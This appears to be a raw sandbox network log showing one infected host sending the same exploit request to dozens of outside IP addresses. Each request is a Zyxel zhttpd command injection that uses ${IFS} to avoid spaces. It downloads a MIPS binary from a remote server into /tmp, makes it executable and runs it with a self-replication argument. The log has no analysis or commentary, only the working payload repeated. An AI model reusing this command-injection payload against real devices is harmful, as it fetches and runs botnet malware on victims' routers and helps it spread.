                                                Jan 12, 2024 18:24:53.280638933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8819192.168.2.1358260172.156.134.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.280699015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8820192.168.2.1342764116.123.247.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.280738115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8821192.168.2.135902618.8.219.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.280796051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8822192.168.2.1358042172.139.215.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.280869007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8823192.168.2.1332774166.151.88.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.280925989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8824192.168.2.134083832.138.205.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.280997038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8825192.168.2.1340340114.107.199.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.281070948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8826192.168.2.135863843.109.203.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.281096935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8827192.168.2.1355096107.32.195.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.281133890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8828192.168.2.134540279.155.115.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.281174898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8829192.168.2.1344014106.170.145.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.281250000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8830192.168.2.135471237.158.67.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.281291008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8831192.168.2.1355736206.220.97.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.281332016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8832192.168.2.1341038213.47.87.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.281416893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8833192.168.2.1333474102.217.204.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.281461000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8834192.168.2.1359890209.26.141.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.281496048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8835192.168.2.1338918199.10.220.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.281589031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8836192.168.2.134627848.206.75.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.281624079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8837192.168.2.1350770188.2.107.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.281697989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8838192.168.2.134485863.23.185.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.281744003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8839192.168.2.1354252133.230.47.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.281826973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8840192.168.2.1342714220.103.186.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.281866074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8841192.168.2.133789476.48.14.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.281910896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8842192.168.2.133740068.93.25.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.281975985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8843192.168.2.1341632102.4.211.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.282020092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8844192.168.2.1344526204.30.240.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.282078981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8845192.168.2.1337546163.0.60.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.282144070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8846192.168.2.133867618.175.205.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.282176018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8847192.168.2.1334914222.133.201.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.282258987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8848192.168.2.1339298160.199.123.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.282275915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8849192.168.2.1355448134.252.125.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.282360077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8850192.168.2.1348786190.83.115.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.282418013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8851192.168.2.134311696.119.55.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.282458067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8852192.168.2.133520837.71.214.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.282501936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8853192.168.2.1349494115.33.129.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.282586098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8854192.168.2.133431684.158.89.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.282624006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8855192.168.2.135966045.182.249.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.282664061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8856192.168.2.1352154204.63.219.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.282718897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8857192.168.2.1347776161.232.124.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.282768965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8858192.168.2.134055673.17.254.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.282813072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8859192.168.2.1350858115.105.124.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.282891035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8860192.168.2.133850094.167.203.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.282913923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8861192.168.2.133400289.8.70.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.282995939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8862192.168.2.1356686105.163.48.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.283054113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8863192.168.2.1353732155.216.216.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.283107996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8864192.168.2.136022841.217.168.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.283164978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8865192.168.2.134175276.254.164.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.283200979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8866192.168.2.135644093.202.44.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.283276081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8867192.168.2.1342612102.138.88.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.283330917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8868192.168.2.1344610146.76.253.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.283380032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8869192.168.2.1351002195.88.81.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.283416986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8870192.168.2.134695497.18.87.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.283478022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8871192.168.2.1342892163.14.229.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.283533096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8872192.168.2.134243651.19.196.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.283607006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8873192.168.2.133334239.32.170.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.283677101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8874192.168.2.1338804184.70.170.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.283704996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8875192.168.2.1351302185.178.239.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.283771992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8876192.168.2.1343092100.40.208.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.283826113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8877192.168.2.134340674.220.1.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.283874035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8878192.168.2.134323453.210.25.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.283900023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8879192.168.2.1347352213.235.147.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.283967018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8880192.168.2.1337770193.190.122.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.284013033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8881192.168.2.1353886115.180.181.56443
                                                TimestampBytes transferredDirectionData
